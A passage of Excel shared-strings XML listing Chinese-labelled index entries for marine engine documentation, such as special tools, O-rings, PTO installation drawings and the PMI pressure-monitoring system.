        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络状态</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无效输入</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统观察</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切入切除测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MOP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>状态</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS 00</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS 909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS 909</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选项</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-07</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-102</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-103</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-104</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-105</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-108</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-110</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-112</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-136</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MS-35</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MTB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MTD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>MTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>M</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>NO2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中央冷却</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>NOX</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制空气图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>OB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>界面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ODS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>OD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>OD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>OD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体的铸造</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>OD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>OM-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环，安全阀套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环，起动阀套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环套，燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>P 140</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>P.G</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">pc </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助程序</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PCB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PCB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接器，柱塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PCB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图解</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PCP-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推进装置控制盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PD-n</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PI 23</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PI01</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PICK-UP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PMI </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>配置文件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PMI </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>许可</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸压力监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供货范围</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件包</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统用户手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统准备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PPP-PTI/PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PROM </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>存储器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PT 100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PT01</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PTI/PTO </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>100%</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO/GCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>必要容量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>概述</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO/PTI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO/RCF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装测试表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置，齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置，主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的甩油环盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰套轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助机械</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和毂盘的铰孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后安装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后尺寸图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后剖面图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体上部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体适配器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
